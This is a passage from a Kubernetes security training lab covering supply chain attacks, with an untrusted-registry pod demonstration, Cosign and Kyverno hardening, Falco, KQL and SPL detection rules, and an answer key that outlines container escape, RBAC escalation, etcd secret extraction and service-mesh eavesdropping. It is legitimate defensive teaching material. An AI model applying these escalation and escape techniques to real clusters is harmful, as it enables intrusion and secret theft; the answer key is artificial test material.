# New pods pull the trojanized image from registry
# 4. With imagePullPolicy: Always — EVERY pod restart pulls fresh,
# so trojanized images affect ALL pods immediately
Finding: Image Tag Mutability Enables Supply Chain Attack
Using imagePullPolicy: IfNotPresent with mutable tags (like 2.1.0 or latest) means an attacker who compromises the registry can replace images. The Always policy would catch the replacement faster but also means every pod restart pulls the malicious image. The only safe approach is image digest pinning combined with image signing.
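The digest-pinning requirement is easy to lint for in CI. A minimal sketch, assuming pod specs are available as dicts; anything without an explicit sha256 digest is treated as unpinned, since even version tags like 2.1.0 are mutable:

```python
import re

# A pinned reference ends in @sha256:<64 hex chars>
DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")


def is_digest_pinned(image_ref: str) -> bool:
    """True only if the image reference carries an explicit sha256 digest."""
    return bool(DIGEST_RE.search(image_ref))


def unpinned_images(pod_spec: dict) -> list:
    """Return every container image in a pod spec that is not digest-pinned."""
    return [c["image"] for c in pod_spec.get("containers", [])
            if not is_digest_pinned(c["image"])]
```

Wiring this into the CI pipeline (fail the build if `unpinned_images` is non-empty) closes the tag-replacement window before the admission controller ever sees the pod.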
Step 5.4: Admission Control Bypass¶
# Check if admission controllers are configured
$ k api-versions | grep admissionregistration
admissionregistration.k8s.io/v1
$ k get validatingwebhookconfigurations
NAME WEBHOOKS AGE
istio-validator-istio-system 1 5d
$ k get mutatingwebhookconfigurations
NAME WEBHOOKS AGE
istio-sidecar-injector 1 5d
# Check for OPA/Gatekeeper
$ k get constrainttemplates
No resources found
# Check for Kyverno
$ k get clusterpolicies
error: the server doesn't have a resource type "clusterpolicies"
Finding: No Image Admission Controller
The cluster has no OPA/Gatekeeper constraints or Kyverno policies for image validation. The only admission webhooks are Istio's sidecar injector and validator. There is no policy preventing:
- Images from untrusted registries
- Images without signatures
- Images with known critical vulnerabilities
- Images using the latest tag
- Images running as root
# Demonstrate: deploy a pod from an untrusted registry
# EDUCATIONAL PSEUDOCODE
$ cat <<'EOF' | k apply -f -
apiVersion: v1
kind: Pod
metadata:
name: untrusted-test
namespace: skyforge-prod
spec:
containers:
- name: untrusted
image: attacker-registry.example.com/malicious-image:latest
command: ["sleep", "86400"]
EOF
pod/untrusted-test created
# No admission controller blocked this — the pod was created successfully
# In a properly secured cluster, this should have been DENIED by:
# 1. An admission webhook that validates image registry allowlists
# 2. An image signing policy (Cosign/Sigstore)
# 3. A vulnerability scan gate
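The missing control boils down to one decision function. A sketch of the core of a validating webhook handler; the response shape follows the Kubernetes AdmissionReview convention, but the allowlist and checks are illustrative, not a production policy:

```python
# Illustrative registry allowlist, not Helios policy
ALLOWED_REGISTRIES = ("registry.helios.example.com/",)


def admit_pod(admission_review: dict) -> dict:
    """Deny pods that use untrusted registries or mutable/absent tags."""
    pod = admission_review["request"]["object"]
    for container in pod["spec"].get("containers", []):
        image = container["image"]
        if not image.startswith(ALLOWED_REGISTRIES):
            return {"allowed": False,
                    "status": {"message": f"untrusted registry: {image}"}}
        # last path segment must carry a tag or digest; :latest is rejected
        if image.endswith(":latest") or ":" not in image.split("/")[-1]:
            return {"allowed": False,
                    "status": {"message": f"mutable or absent tag: {image}"}}
    return {"allowed": True}
```

In practice this logic lives behind a TLS-terminated webhook endpoint registered via a ValidatingWebhookConfiguration; Kyverno and Gatekeeper implement the same pattern declaratively, with signature verification and vulnerability gates layered on top.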
Step 5.5: Image Signing and Verification¶
# Demonstrate proper image signing with Cosign
# EDUCATIONAL PSEUDOCODE — shows the correct defensive workflow
# Step 1: Generate a signing keypair
$ cosign generate-key-pair
Enter password for private key: REDACTED
Private key written to cosign.key
Public key written to cosign.pub
# Step 2: Sign the image after building
$ cosign sign --key cosign.key registry.helios.example.com/skyforge/data-processor:2.1.0@sha256:REDACTED_DIGEST
Pushing signature to: registry.helios.example.com/skyforge/data-processor:sha256-REDACTED_DIGEST.sig
# Step 3: Verify the signature before deployment
$ cosign verify --key cosign.pub registry.helios.example.com/skyforge/data-processor:2.1.0@sha256:REDACTED_DIGEST
Verification for registry.helios.example.com/skyforge/data-processor:2.1.0@sha256:REDACTED_DIGEST --
The following checks were performed on each of these signatures:
- The cosign claims were validated
- The signatures were verified against the specified public key
[{"critical":{"identity":{"docker-reference":"registry.helios.example.com/skyforge/data-processor"},"image":{"docker-manifest-digest":"sha256:REDACTED_DIGEST"},"type":"cosign container image signature"},"optional":{"Issuer":"https://accounts.helios.example.com","Subject":"ci-pipeline@helios.example.com"}}]
# Step 4: Enforce with admission policy (Kyverno example)
$ cat <<'EOF' | k apply -f -
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: require-image-signature
spec:
validationFailureAction: Enforce
background: false
rules:
- name: verify-image-signature
match:
any:
- resources:
kinds:
- Pod
verifyImages:
- imageReferences:
- "registry.helios.example.com/skyforge/*"
attestors:
- entries:
- keys:
publicKeys: |-
-----BEGIN PUBLIC KEY-----
REDACTED-COSIGN-PUBLIC-KEY
-----END PUBLIC KEY-----
EOF
# Use image digests instead of mutable tags
# SECURE pod spec:
$ cat <<'EOF'
apiVersion: v1
kind: Pod
metadata:
name: data-processor-secure
namespace: skyforge-prod
spec:
containers:
- name: processor
# Pin to digest — immutable reference, cannot be replaced
image: registry.helios.example.com/skyforge/data-processor@sha256:a1b2c3d4e5f6REDACTED
imagePullPolicy: Always
securityContext:
runAsNonRoot: true
runAsUser: 65534
readOnlyRootFilesystem: true
allowPrivilegeEscalation: false
capabilities:
drop:
- ALL
EOF
Detection: Supply Chain Attacks¶
Falco Rules¶
# Falco rule: Detect image from untrusted registry
- rule: Image from Untrusted Registry
desc: Pod created with image from a registry not in the allowlist
condition: >
kevt and kcreate and ka.target.resource = "pods"
and not ka.req.pod.containers.image pmatch (
"registry.helios.example.com/*",
"docker.io/library/*",
"gcr.io/distroless/*",
"quay.io/istio/*"
)
output: >
Pod created with image from untrusted registry
(user=%ka.user.name image=%ka.req.pod.containers.image
pod=%ka.target.name ns=%ka.target.namespace)
priority: HIGH
tags: [k8s, supply_chain, untrusted_image]
# Falco rule: Detect image with latest tag
- rule: Image Using Latest Tag
desc: Pod created with :latest tag — mutable and unverifiable
condition: >
kevt and kcreate and ka.target.resource = "pods"
and ka.req.pod.containers.image contains ":latest"
output: >
Pod using :latest image tag (user=%ka.user.name
image=%ka.req.pod.containers.image pod=%ka.target.name)
priority: MEDIUM
tags: [k8s, supply_chain, latest_tag]
# Falco rule: Detect unexpected binary execution in container
- rule: Unexpected Process in Container
desc: An unexpected binary was executed in a known container image
condition: >
spawned_process and container
and container.image.repository = "registry.helios.example.com/skyforge/data-processor"
and not proc.name in (python3, pip, sh, bash, processor.py)
output: >
Unexpected process in data-processor container
(process=%proc.name command=%proc.cmdline container=%container.name
pod=%k8s.pod.name image=%container.image.repository)
priority: HIGH
tags: [container, supply_chain, unexpected_process]
KQL Detection¶
// KQL: Detect images from untrusted registries
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create" and AuditLog.objectRef.resource == "pods"
| extend Image = tostring(AuditLog.requestObject.spec.containers[0].image)
| where Image !startswith "registry.helios.example.com/"
and Image !startswith "gcr.io/distroless/"
and Image !startswith "docker.io/istio/"
| project TimeGenerated,
User = AuditLog.user.username,
PodName = AuditLog.objectRef.name,
Namespace = AuditLog.objectRef.namespace,
Image,
SourceIP = AuditLog.sourceIPs[0]
| sort by TimeGenerated desc
// KQL: Detect images using latest tag or no digest
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create" and AuditLog.objectRef.resource == "pods"
| extend Image = tostring(AuditLog.requestObject.spec.containers[0].image)
| where Image has ":latest" or (Image !has "@sha256:" and Image !has_any (":v", ":1.", ":2.", ":3."))
| project TimeGenerated,
User = AuditLog.user.username,
PodName = AuditLog.objectRef.name,
Image
| sort by TimeGenerated desc
// KQL: Detect new container image pull from untrusted source
ContainerInventory
| where ImageTag == "latest" or Image !startswith "registry.helios.example.com"
| project TimeGenerated, ContainerID, Image, ImageTag, ContainerState
| sort by TimeGenerated desc
SPL Detection¶
// SPL: Detect images from untrusted registries
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=pods
| spath "requestObject.spec.containers{}.image" as image
| where NOT match(image, "^registry\.helios\.example\.com/")
AND NOT match(image, "^gcr\.io/distroless/")
| table _time, user.username, objectRef.name, objectRef.namespace, image
// SPL: Detect images with known critical vulnerabilities (from Trivy integration)
index=trivy sourcetype="trivy:scan"
| spath "Results{}.Vulnerabilities{}.Severity" as severity
| where severity="CRITICAL"
| stats count as critical_vulns by ArtifactName, ArtifactType
| where critical_vulns > 0
| sort -critical_vulns
| table ArtifactName, critical_vulns
// SPL: Detect unexpected image pull events
index=kubernetes sourcetype="kube:events"
reason="Pulling" OR reason="Pulled"
| spath "involvedObject.name" as pod_name
| spath "message" as msg
| rex field=msg "image \"(?<image>[^\"]+)\""
| where NOT match(image, "^registry\.helios\.example\.com/")
| table _time, pod_name, image, msg
Defensive Measures: Securing the Supply Chain¶
Prevention Controls
1. Image Digest Pinning
Always reference images by digest, never by mutable tag:
# BAD — mutable tag
image: registry.helios.example.com/skyforge/data-processor:2.1.0
# GOOD — immutable digest
image: registry.helios.example.com/skyforge/data-processor@sha256:a1b2c3d4REDACTED
2. Registry Allowlist with Admission Controller
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: restrict-image-registries
spec:
validationFailureAction: Enforce
rules:
- name: validate-registries
match:
any:
- resources:
kinds:
- Pod
validate:
message: "Images must come from approved registries"
pattern:
spec:
containers:
- image: "registry.helios.example.com/*"
3. Vulnerability Scanning Gate in CI/CD
# CI/CD pipeline step (PSEUDOCODE)
- name: scan-image
run: |
trivy image --exit-code 1 --severity CRITICAL \
registry.helios.example.com/skyforge/$IMAGE:$TAG
# Pipeline fails if CRITICAL vulnerabilities found
4. Multi-Stage Builds with Distroless Base
# Build stage
FROM python:3.11-slim AS builder
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir --target=/install -r requirements.txt
COPY . .
# Production stage — minimal attack surface
FROM gcr.io/distroless/python3-debian12:nonroot
COPY --from=builder /install /usr/local/lib/python3.11/site-packages
COPY --from=builder /app /app
WORKDIR /app
USER 65534
ENTRYPOINT ["python3", "/app/processor.py"]
5. Container Image Signing Enforcement
Deploy Cosign + Kyverno or Connaisseur to enforce image signatures on all pod creation events.
6. Read-Only Container Filesystems
Set readOnlyRootFilesystem: true in each container's securityContext so a compromised process cannot write payloads into the running container at runtime.
Exercise 5 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 5.1 | Image vulnerability scan | 23 CRITICAL + embedded secrets | Critical |
| 5.2 | Trojanized image analysis | Multiple backdoor vectors identified | Critical |
| 5.3 | Image pull policy abuse | Mutable tags enable image replacement | High |
| 5.4 | Admission control audit | No image validation policies | High |
| 5.5 | Image signing gap | No signature verification in place | High |
Answer Key¶
Exercise 1: Container Escape¶
Exercise 1 Answers
Q: What Linux capability is required for the nsenter container escape? A: CAP_SYS_ADMIN is the primary capability needed. Combined with CAP_SYS_PTRACE and access to /proc, it allows entering the host's namespaces via nsenter --target 1.
Q: Why is mounting the host root filesystem at /host dangerous? A: It gives the container read-write access to the entire host filesystem, including /etc/shadow, kubelet credentials at /var/lib/kubelet/, other pods' secret volumes, and the container runtime socket. This makes container escape trivial.
Q: What is the detection gap when an attacker uses nsenter? A: After nsenter, the attacker's processes run in the host's PID namespace. Standard container-level monitoring (like container logs) will not see these processes. You need host-level monitoring (Falco as DaemonSet, auditd, or eBPF-based tools) to detect the escape.
Q: How does Docker socket access differ from nsenter escape? A: Docker socket access allows creating new containers with arbitrary configurations (privileged, host networking, etc.). nsenter enters the host's existing namespaces directly. Both achieve host access, but Docker socket abuse creates new artifacts (containers) that are more detectable.
Exercise 2: RBAC Exploitation¶
Exercise 2 Answers
Q: What is the minimum RBAC permission needed to escalate to cluster-admin? A: The ability to create ClusterRoleBinding resources (rbac.authorization.k8s.io API group, clusterrolebindings resource, create verb). An attacker can bind any existing ClusterRole (including cluster-admin) to any subject.
Q: Why is pods/exec permission dangerous? A: pods/exec allows executing commands inside any pod the SA has access to. This can be used to steal service account tokens, access mounted secrets, and pivot to other workloads — all without creating new pods.
Q: What is the RBAC escalation chain in this exercise? A: data-processor-sa (list secrets) → steal deploy-pipeline-sa token from skyforge-ci namespace → deploy-pipeline-sa has RBAC wildcard permissions → create ClusterRoleBinding granting data-processor-sa cluster-admin.
Q: How should CI/CD service accounts be properly scoped? A: CI/CD service accounts should use namespace-scoped Roles (not ClusterRoles), have permissions limited to deployments, services, and configmaps only, and should never have create/update on clusterrolebindings or secrets.
Exercise 3: etcd Secret Extraction¶
Exercise 3 Answers
Q: Why are Kubernetes secrets not encrypted by default in etcd? A: By default, Kubernetes stores secrets as base64-encoded data in etcd — base64 is an encoding, not encryption. The EncryptionConfiguration API resource must be explicitly configured to enable encryption at rest using AES-CBC, AES-GCM, or a KMS provider.
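The encoding-versus-encryption distinction takes two lines to demonstrate (value is synthetic):

```python
import base64

# Exactly what etcd stores by default: reversible encoding, no key required
stored = base64.b64encode(b"db-password=REDACTED").decode()
recovered = base64.b64decode(stored).decode()
print(recovered)  # anyone with etcd read access gets the plaintext back
```

With encryption at rest configured, the etcd value instead begins with a provider prefix such as k8s:enc:aescbc:v1: and cannot be recovered without the key.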
Q: What certificates are needed to access etcd? A: etcd requires mutual TLS authentication. You need the etcd CA certificate (ca.crt), a client certificate (server.crt or healthcheck-client.crt), and the corresponding private key. These are stored at /etc/kubernetes/pki/etcd/ on the control plane node.
Q: What is the difference between etcd encryption and using an external secrets manager? A: etcd encryption at rest protects secrets stored in etcd's data directory on disk. An external secrets manager (Vault, AWS Secrets Manager) removes secrets from etcd entirely — the cluster only stores references, and secrets are fetched at runtime. External managers also provide rotation, auditing, and dynamic secrets.
Q: How can you detect unauthorized etcd access? A: Monitor for: (1) etcdctl process execution on control plane nodes, (2) network connections to port 2379 from non-API-server sources, (3) file access to /etc/kubernetes/pki/etcd/ by unexpected processes, (4) etcd audit logs showing GET requests for /registry/secrets/ paths.
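Detection items (1) and (3) can be covered with host-level auditd watches on the control plane. An illustrative rules fragment, assuming a standard Linux auditd deployment and an etcdctl binary at /usr/local/bin/etcdctl (adjust paths to your distribution):

```
# /etc/audit/rules.d/etcd.rules (illustrative, not a complete policy)
-w /etc/kubernetes/pki/etcd/ -p rwa -k etcd_pki_access
-w /var/lib/etcd/ -p rwa -k etcd_data_access
-a always,exit -F arch=b64 -S execve -F exe=/usr/local/bin/etcdctl -k etcdctl_exec
```

Forward the resulting audit events to the SIEM and alert on any etcd_pki_access hit from a process other than the API server or etcd itself.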
Exercise 4: Service Mesh Attacks¶
Exercise 4 Answers
Q: What is the difference between PERMISSIVE and STRICT mTLS modes? A: PERMISSIVE accepts both mTLS and plaintext connections — it is a transition mode. STRICT requires mTLS for all connections and rejects plaintext. Always use STRICT in production after confirming all services have sidecars.
Q: Why does direct pod-to-pod communication bypass the mesh? A: Istio's Envoy sidecar intercepts traffic on the pod's network interface. When traffic goes through the Kubernetes Service, Envoy can enforce policies. Direct pod IP communication on the application port bypasses the sidecar's iptables rules, avoiding mTLS, authorization policies, and telemetry.
Q: How does VirtualService traffic mirroring enable eavesdropping? A: Istio's mirror directive copies incoming requests to a secondary destination. The attacker adds a mirror pointing to their controlled pod, receiving a copy of every request (including headers, tokens, and body) without disrupting the legitimate traffic flow. The original service still receives and responds to all requests normally.
Q: What is the SPIFFE identity extracted from the sidecar? A: The SPIFFE identity format is spiffe://cluster.local/ns/<namespace>/sa/<service-account>. In this exercise, spiffe://cluster.local/ns/skyforge-prod/sa/auth-service-sa. This identity is used for service-to-service authentication in the mesh. Stealing the certificate allows impersonating this service.
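A tiny parser for this identity format, assuming the default Istio workload layout (spiffe://<trust-domain>/ns/<namespace>/sa/<service-account>) shown above:

```python
def parse_spiffe_id(uri: str) -> dict:
    """Split an Istio workload SPIFFE URI into its components."""
    prefix = "spiffe://"
    if not uri.startswith(prefix):
        raise ValueError("not a SPIFFE URI")
    trust_domain, _, path = uri[len(prefix):].partition("/")
    parts = path.split("/")  # expected: ns/<namespace>/sa/<service-account>
    if len(parts) != 4 or parts[0] != "ns" or parts[2] != "sa":
        raise ValueError("unexpected workload identity path")
    return {"trust_domain": trust_domain,
            "namespace": parts[1],
            "service_account": parts[3]}
```

This is handy when triaging mesh telemetry: mapping peer certificates back to namespace and service account makes impersonation attempts (a stolen auth-service-sa identity appearing from an unexpected pod) stand out.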
Exercise 5: Supply Chain & Image Attacks¶
Exercise 5 Answers
Q: Why is imagePullPolicy: IfNotPresent insufficient for security? A: With IfNotPresent, once an image is cached on a node, it is never re-pulled. If the registry image is replaced (trojanized), existing pods are safe but new pods on nodes without the cache will pull the malicious image. Neither IfNotPresent nor Always is secure without image digest pinning.
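The cache interaction can be captured in a toy model of kubelet pull behaviour (a simplification for teaching, not kubelet source):

```python
def will_pull(policy: str, image_cached_on_node: bool) -> bool:
    """Toy model of the kubelet's image-pull decision per imagePullPolicy."""
    if policy == "Always":
        return True  # fresh pull on every pod start
    if policy == "IfNotPresent":
        return not image_cached_on_node  # cached image wins, even if the registry tag changed
    if policy == "Never":
        return False
    raise ValueError(f"unknown policy: {policy}")
```

The model makes the failure mode explicit: after a tag is trojanized, IfNotPresent nodes with a cache keep serving the old image while uncached nodes silently pull the malicious one, producing a mixed fleet that is hard to reason about.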
Q: How does image digest pinning prevent supply chain attacks? A: A digest (@sha256:abc123...) is a cryptographic hash of the image manifest. Even if an attacker pushes a new image with the same tag, the digest will be different. Kubernetes will refuse to run the image if the pulled digest does not match the specified digest.
Q: What are the three layers of supply chain defense? A: (1) Image scanning — Trivy/Grype in CI/CD to catch vulnerabilities and secrets. (2) Image signing — Cosign/Sigstore to verify image provenance and integrity. (3) Admission control — Kyverno/OPA/Connaisseur to enforce policies at deploy time (registry allowlist, signature verification, vulnerability thresholds).
Q: Why are multi-stage builds with distroless images important? A: Multi-stage builds separate the build environment (compilers, build tools, source code) from the runtime image. Distroless images contain only the application and its runtime dependencies — no shell, no package manager, no debugging tools. This reduces the attack surface from hundreds of packages to a minimal set, and makes post-exploitation significantly harder for an attacker.
Instructor Notes¶
Lab Facilitation Guide¶
Running This Lab
Group Exercise (recommended: 3–5 participants)
- Split into red team and blue team
- Red team works through Exercises 1–5
- Blue team monitors Falco alerts and writes detection rules in real-time
- Debrief after each exercise: what was detected? What was missed?
Individual Exercise
- Work through exercises sequentially — each builds on the prior
- Spend extra time on the detection sections — write your own rules before reading the answers
- Use a local kind/minikube cluster — all exercises are self-contained
Assessment Criteria
| Criterion | Points | Description |
|---|---|---|
| Container escape completed | 15 | Successfully escaped to host via nsenter |
| RBAC chain identified | 20 | Documented full escalation path |
| etcd secrets extracted | 15 | Extracted and decoded at least 3 secrets |
| Service mesh bypass demonstrated | 15 | Showed mTLS bypass and traffic mirroring |
| Supply chain risk documented | 10 | Trivy scan + admission control audit |
| Detection rules written | 15 | KQL/SPL/Falco rules for each exercise |
| Defensive recommendations | 10 | Actionable hardening for each finding |
| Total | 100 | |
Time Management
- Exercise 1: 60–75 min (container escape is foundational)
- Exercise 2: 60–75 min (RBAC chain requires careful enumeration)
- Exercise 3: 45–60 min (straightforward once on control plane)
- Exercise 4: 60–75 min (service mesh concepts may need introduction)
- Exercise 5: 45–60 min (scanning tools do heavy lifting)
Common Mistakes¶
Watch Out For
- Forgetting to check existing RBAC before escalating — always enumerate with `kubectl auth can-i --list` first
- Not documenting the attack chain — each step should be logged with timestamps
- Skipping detection — the red team value is in the detection rules, not just the exploitation
- Using real IPs or domains — all outputs must use RFC 5737 / *.example.com
- Neglecting the defensive measures — each exercise's prevention controls are just as important as the attack steps
Cleanup¶
# Remove the lab cluster
$ kind delete cluster --name skyforge-lab
Deleting cluster "skyforge-lab" ...
# Verify cleanup
$ kind get clusters
No kind clusters found.
# Remove any local files
$ rm -f kind-config.yaml cosign.key cosign.pub secrets_dump.json novaplatform-openapi.json
References¶
| Resource | URL |
|---|---|
| MITRE ATT&CK Containers Matrix | https://attack.mitre.org/matrices/enterprise/containers/ |
| Kubernetes Security Documentation | https://kubernetes.io/docs/concepts/security/ |
| CIS Kubernetes Benchmark | https://www.cisecurity.org/benchmark/kubernetes |
| Falco Rules Repository | https://github.com/falcosecurity/rules |
| kube-hunter | https://github.com/aquasecurity/kube-hunter |
| peirates | https://github.com/inguardians/peirates |
| Trivy | https://github.com/aquasecurity/trivy |
| Istio Security Best Practices | https://istio.io/latest/docs/ops/best-practices/security/ |
| Cosign / Sigstore | https://github.com/sigstore/cosign |
| Kubernetes RBAC Good Practices | https://kubernetes.io/docs/concepts/security/rbac-good-practices/ |
| etcd Encryption at Rest | https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/ |
| NSA/CISA Kubernetes Hardening Guide | https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF |
Lab 26 is part of the Nexus SecOps Labs series. Complete Lab 13 (Cloud Red Team) first for foundational cloud attack knowledge before attempting this lab.